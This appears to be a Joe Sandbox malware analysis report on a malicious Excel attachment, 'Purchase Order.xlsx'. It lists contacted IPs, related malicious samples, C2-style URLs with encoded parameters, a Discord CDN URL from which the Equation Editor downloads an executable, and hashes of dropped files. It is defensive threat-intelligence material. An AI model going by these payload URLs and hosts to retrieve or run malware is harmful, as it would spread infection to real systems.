                                                                                                                                                        http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://search.interpark.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://investor.msn.com/explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown

                                                                                                                                                                    Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    162.159.130.233
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                    103.209.233.78
                                                                                                                                                                    unknownHong Kong
                                                                                                                                                                    132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                                                                                    50.87.169.249
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                    104.21.47.75
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                    208.92.209.208
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    36536ENTERHOST-ASUStrue
                                                                                                                                                                    23.228.109.141
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    46573LAYER-HOSTUStrue
                                                                                                                                                                    81.17.18.195
                                                                                                                                                                    unknownSwitzerland
                                                                                                                                                                    51852PLI-ASCHtrue

                                                                                                                                                                    Private

                                                                                                                                                                    IP
                                                                                                                                                                    192.168.2.255

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                    Analysis ID:344798
                                                                                                                                                                    Start date:27.01.2021
                                                                                                                                                                    Start time:07:15:29
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 11m 37s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:light
                                                                                                                                                                    Sample file name:Purchase Order.xlsx
                                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                    Number of analysed new started processes analysed:12
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.troj.expl.evad.winXLSX@12/12@12/8
                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                    HDC Information:
                                                                                                                                                                    • Successful, ratio: 36.2% (good quality ratio 34.3%)
                                                                                                                                                                    • Quality average: 74.7%
                                                                                                                                                                    • Quality standard deviation: 28.7%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 93%
                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                    • Found application associated with file extension: .xlsx
                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                    • Scroll down
                                                                                                                                                                    • Close Viewer
                                                                                                                                                                    Warnings:
                                                                                                                                                                    Show All
                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    07:16:13API Interceptor41x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                    07:16:19API Interceptor34x Sleep call for process: dtz25z5e9sr.exe modified
                                                                                                                                                                    07:16:36API Interceptor209x Sleep call for process: svchost.exe modified
                                                                                                                                                                    07:17:04API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    162.159.130.233PAY SLIP.docGet hashmaliciousBrowse
                                                                                                                                                                    • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                                                                                                                                    SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                                                                                                                                                    • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                                                                                                                                                    part1.rtfGet hashmaliciousBrowse
                                                                                                                                                                    • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe
                                                                                                                                                                    81.17.18.195PO81105083.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • www.streamelemeants.com/j5an/?L2JH=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&0n=fxlL
                                                                                                                                                                    KuPBIsrqbO.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.lakeviewbarbershonola.com/gqx2/?MnZ=Ie6QWhcnBKw0CGg1XJOkUi0EQjBhFk91sVnWxFvJgDqo9wqAijnneb/Qtq5IK98OLw5iavE1Ug==&J4n4=xPGHQlaxx
                                                                                                                                                                    CQcT4Ph03Z.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.bradforrexchange.com/de92/?2dB=AuB39/+NhwYvNpmYsU56h9Jw033PjYHlbqtX9hV51WYzN0I0XMKXLKFUtOhkTpTYnpZ3&EjY=dfm47PfpCVQ
                                                                                                                                                                    Pre-order.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • www.hypelighystrip.com/o8na/?0d=Tq0zJifo+3REINNp5tEI7D1NZE4MCNF9z1x+uMsX8HCpVos7zs/lt8RrqnRTN25y/ayBqQ==&s8=Kr-01Z1H
                                                                                                                                                                    SUNEJ PAYMENT.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.insidescripps.net/m8ec/?ETRTzvU=X8lLyDsNXv2mT/bPfdRvxrUpLP3y9kI1l8JMWdoezlOdwFjrrfZ2wLD/jyjoB6dKuPV5&DzrLW=VDKPcpdPnjE8Qb
                                                                                                                                                                    trasferimento bancario pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.be-cold-sore-free.com/nwc9/?IToxs4h=PYd4KA2iSEOd71lwKJMq9rZoqRv3Lx228L9Oj1zEmj3IjFWLMhyPkhhwFbuvn+9t8+mH&Bl=lHU80XfhY8y
                                                                                                                                                                    Payment Receipt.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.myscpmed.com/shwq/?-Z2h=TdzriGICj8BI4SyI3Zn4F6UD5wezJWJOxLMt9ciMXdlwWSV4B+euDB6FS5jXWl5NFSzU&jnSl=Ujcd1
                                                                                                                                                                    XCnhrl4qRO.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.batttleroyaleuk.com/xnc/?uN9da=Ok9AvPWPUKYaePVTL6j/d+7uOADfF/hwNe2/6JFu0ZvSkbhtf3C2Uccjo1JF0BiznP5J&iB=CnlpdrqHk6fHx
                                                                                                                                                                    http://walmartmoneyca4d.comGet hashmaliciousBrowse
                                                                                                                                                                    • walmartmoneyca4d.com/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYwNDcxMTUyOSwiaWF0IjoxNjA0NzA0MzI5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycDJnczVmYTFzNGFvaHZiOGMwb2xmc2oiLCJuYmYiOjE2MDQ3MDQzMjksInRzIjoxNjA0NzA0MzI5NTExMzMwfQ.qBJDdLuD2b0BUR0iunva69F_OVU8s9q9BVb0EKmQsFo&sid=7ecc5608-2085-11eb-80f2-8cfac5709566
                                                                                                                                                                    PI10943.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.followmyubmdhealth.com/xnc/?-Zlpi6A=83V4/6teZS2RAw4W3CpbaI2bmhywWu5wMxsM/JW18yVcw5Fqze+LU4WiwgTp2UX+a8JL&2dB=lnxh
                                                                                                                                                                    HussCrypted.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.wwwawrusa.com/cia6/?JtxL=XPv4nNDh&DXFTE=kEIcwKQzm2fkTgMtpA1l/XLlN6qyj425UOJKH0ojp7jEV2cfhVIm7q30Z+a0q8b9UF5Ci5kSUg==
                                                                                                                                                                    http://nihwebex.comGet hashmaliciousBrowse
                                                                                                                                                                    • nihwebex.com/
                                                                                                                                                                    Amacon Order Specification Requirement.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.uswithc.com/aqu2/?uzul=jjFpRLYPltD8u0&FTjhTH0=VU4ytYD2UdSdtrW6jTUmwwynK5Rmx8O8tG+3wrX4eGGIrmKqqU/4W5+CyWxsrMCa8wNm
                                                                                                                                                                    Amacon Company profile & about us.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.uswithc.com/aqu2/?_TAHxl=ZL3hMDhPFVz&hbWhmPd=VU4ytYD2UdSdtrW6jTUmwwynK5Rmx8O8tG+3wrX4eGGIrmKqqU/4W5+CyW9s4cOZlgNwEThnZQ==
                                                                                                                                                                    Confirm!!!.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.safariflorist.com/3iw/?wh=fVcxXbr1VFY0vJdP1J5nZP1yS3y9jR0OedObz6l5iNpCsakFdBfixoBrK4YuJJNL1pgQZhjOhQ==&DR=ypFHslT
                                                                                                                                                                    exploit.docGet hashmaliciousBrowse
                                                                                                                                                                    • www.rocksutoparts.com/r2y/?QZ=mkZnBo92XqxPlWnggDGeTsdiI/5qoleyJO7XXgK6U26NPudH87V5wNvsr1Sb3o4YB3uUVw==&-ZD0q=NL0hlzd
                                                                                                                                                                    8GkEt38SOS.exeGet hashmaliciousBrowse
                                                                                                                                                                    • www.thebarnhairdressing.com/ugk/?8pV8pfMX=s5r7xaHYoTI431qfsIPIk91ZRWpB8CrXi4HUQnDAZqcvvzYCcy90PfTh0VE+HjUgD6h1&Ezr0pp=apIHk4n8RJplV4

                                                                                                                                                                    Domains

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    cdn.discordapp.comSecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                    PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                    SecuriteInfo.com.Variant.Zusy.363976.7571.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                    SecuriteInfo.com.Variant.Zusy.363976.21086.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                    RFQ RPM202011-776JD.jpg.lnkGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                    Revised-RBG-180129940.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                    eTDAg77Nif.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                    hG8XQh9hMy.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    qp38gXDG87.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                    SecuriteInfo.com.Trojan.DownLoader36.37095.24479.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                    PO81105083.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                    agenciatributaria5668.vbsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                    invoice68684881.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                    invoice68684881.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                    PaySlip140121.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.135.233
                                                                                                                                                                    PaySlip140121.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                    TT Slip.docGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                    n#U00b0761.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                    n#U00b0761.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.129.233
                                                                                                                                                                    www.streamelemeants.comPO81105083.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 81.17.18.195

                                                                                                                                                                    ASN

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    CLOUDFLARENETUSSecuriteInfo.com.BehavesLike.Win32.PUPXAA.gc.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.169.213
                                                                                                                                                                    SecuriteInfo.com.BehavesLike.Win32.SoftPulse.gc.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.169.213
                                                                                                                                                                    SecuriteInfo.com.BehavesLike.Win32.SoftPulse.gc.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.27.240
                                                                                                                                                                    SecuriteInfo.com.Generic.mg.d82abc4e3bc3179d.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.169.213
                                                                                                                                                                    SecuriteInfo.com.BehavesLike.Win32.SoftPulse.gc.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.27.240
                                                                                                                                                                    SecuriteInfo.com.BehavesLike.Win32.PUPXAA.gc.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.169.213
                                                                                                                                                                    SecuriteInfo.com.Heur.30497.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.198.109
                                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.8790.14645.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.200.147
                                                                                                                                                                    SecuriteInfo.com.Trojan.DOC.Agent.ATB.11104.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.201.174
                                                                                                                                                                    SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    SecuriteInfo.com.Trojan.Inject4.6746.26345.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                    case (2553).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.44.135
                                                                                                                                                                    case (2553).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.60.169
                                                                                                                                                                    case (1057).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.198.109
                                                                                                                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.73.69
                                                                                                                                                                    case (4335).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.73.69
                                                                                                                                                                    case (1522).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.73.69
                                                                                                                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 104.21.60.169
                                                                                                                                                                    case (166).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 172.67.198.109
                                                                                                                                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 104.16.19.94
                                                                                                                                                                    POWERLINE-AS-APPOWERLINEDATACENTERHKNEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 154.216.110.171
                                                                                                                                                                    win32.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 156.252.101.208
                                                                                                                                                                    Request.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 103.85.191.228
                                                                                                                                                                    New Year Inquiry List.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 154.88.195.177
                                                                                                                                                                    INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.220.146.68
                                                                                                                                                                    SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.220.38.201
                                                                                                                                                                    CiL08gVVjl.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 45.114.104.67
                                                                                                                                                                    worked.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.193.20.238
                                                                                                                                                                    SecuriteInfo.com.Trojan.PackedNET.507.23078.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 156.252.101.208
                                                                                                                                                                    payment list.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 154.216.110.171
                                                                                                                                                                    CQAOPIhHJZ.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.216.110.70
                                                                                                                                                                    e0ciSGkcJn.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.201.243.172
                                                                                                                                                                    0f9zzITIbk.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 156.250.194.212
                                                                                                                                                                    PO81053.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.216.242.242
                                                                                                                                                                    GyBBbv73Ur.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 45.147.213.4
                                                                                                                                                                    RrZ6BOnPCG.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 45.114.104.67
                                                                                                                                                                    Invoice Payment Details.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 156.250.194.212
                                                                                                                                                                    3KvCNpcQ6tvwKr5.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.218.202.166
                                                                                                                                                                    ucPCgX1NlH.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 154.202.142.207
                                                                                                                                                                    notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 154.202.142.207
                                                                                                                                                                    UNIFIEDLAYER-AS-1USquote20210126.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 70.40.220.182
                                                                                                                                                                    Informacion.docGet hashmaliciousBrowse
                                                                                                                                                                    • 162.241.224.176
                                                                                                                                                                    xl2Ml2iNJe.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.241.217.108
                                                                                                                                                                    file.docGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.52.115
                                                                                                                                                                    Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.214.76.195
                                                                                                                                                                    vA0mtZ7JzJ.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 162.241.60.214
                                                                                                                                                                    INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                                                                                                                                                                    • 74.220.199.9
                                                                                                                                                                    Dridex-01-a99e.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    • 198.57.200.100
                                                                                                                                                                    Inv_1480.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.217.211
                                                                                                                                                                    Mensaje-22-012021.docGet hashmaliciousBrowse
                                                                                                                                                                    • 162.241.253.129
                                                                                                                                                                    INV5949.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 192.232.216.109
                                                                                                                                                                    DOCUMENTS_RECEIVED.htmlGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.112.211
                                                                                                                                                                    INV 5047.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.217.211
                                                                                                                                                                    FP4554867134UQ.docGet hashmaliciousBrowse
                                                                                                                                                                    • 192.232.250.227
                                                                                                                                                                    MENSAJE.docGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.52.115
                                                                                                                                                                    MENSAJE.docGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.52.115
                                                                                                                                                                    Archivo_AB-96114571.docGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.52.115
                                                                                                                                                                    1_25_2021 11_20_30 a.m., [Payment 457 CMSupportDev].htmlGet hashmaliciousBrowse
                                                                                                                                                                    • 50.87.150.0
                                                                                                                                                                    5390080_2021_1-259043.docGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.52.115
                                                                                                                                                                    5390080_2021_1-259043.docGet hashmaliciousBrowse
                                                                                                                                                                    • 192.185.52.115

                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.Heur.30497.xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (2553).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (1057).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (4335).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (1522).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (4374).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (166).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (547).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    The Mental Health Center.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    SC-TR1167700000.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (348).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (426).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (250).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (1447).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233
                                                                                                                                                                    case (850).xlsGet hashmaliciousBrowse
                                                                                                                                                                    • 162.159.130.233

                                                                                                                                                                    Dropped Files

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exePO#21010028 - SYINDAC QT-00820_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      MC8ZX01sSo.exeGet hashmaliciousBrowse
                                                                                                                                                                        F6AAdCq3uj.exeGet hashmaliciousBrowse
                                                                                                                                                                          tZy7EYc9Da.exeGet hashmaliciousBrowse
                                                                                                                                                                            YMQ6XNETnU.exeGet hashmaliciousBrowse
                                                                                                                                                                              AWB 9899691012 TRACKING INFO_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                BANK FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                  order0004345.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    Bill of Lading BL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      Clntnjk.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        HTG-9066543.exeGet hashmaliciousBrowse
                                                                                                                                                                                          vbc.exeGet hashmaliciousBrowse
                                                                                                                                                                                            HTMY-209871640.exeGet hashmaliciousBrowse
                                                                                                                                                                                              YOeg64zDX4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                qZtylTGU0c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  w2kN50kQQ4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                    EOJ55l6pzU.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      payload.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                        payload.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          ResistanceWallet_2.2.8.exeGet hashmaliciousBrowse

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe
                                                                                                                                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):772519
                                                                                                                                                                                                            Entropy (8bit):7.418330987363757
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:j2HExSVOfCd3zYo/t06XRYahwLBV/N/aXFrMGUFoweuoDvGE84nl1GWK+WrF:jl8Eo/q4RJhYflsyAlu2fGWvw
                                                                                                                                                                                                            MD5:40BFB08CE97F3709F4DE7C6BA8B3401E
                                                                                                                                                                                                            SHA1:203515852D43907510315684682A1F1453DB2E80
                                                                                                                                                                                                            SHA-256:2D62D3A5D3989B0DCC3484BF4D5FC73FE78546EFAD83D8CF0FD12B19E2EA65F7
                                                                                                                                                                                                            SHA-512:D09C744BA65587EEC76D4204305B15B93B64A37EDDDA52310F2980C5CE6481CDC1AF691F2762371123A4D49A5EE42E54477BFBE40F275EBCA29794EBFCE99EC5
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            IE Cache URL:https://cdn.discordapp.com/attachments/801801194535518211/803618842571702292/scancopy87867678.exe
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d...|......a4............@.......................................@.................................8...........<............................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...<...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\205620C7.emf
                                                                                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):653280
                                                                                                                                                                                                            Entropy (8bit):2.898608770817033
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:S34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:84UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                                                            MD5:6AED6213D833268E6FC055A7BFAD6840
                                                                                                                                                                                                            SHA1:3F43F767D1F2118AABB228FC4E0C10F9A11442ED
                                                                                                                                                                                                            SHA-256:AEE4E2FB9AA7E8769B7FF18BAEC197EC13B3FCACC08D91F8CEEBD9538ADD5608
                                                                                                                                                                                                            SHA-512:303B3F7C6782C8A2674409B5AF36A639657269394213E25950E245262A0A811765CEEDFF6FAEF0984785E391E88AA59F0C49115913201893EC636944C3F44B7E
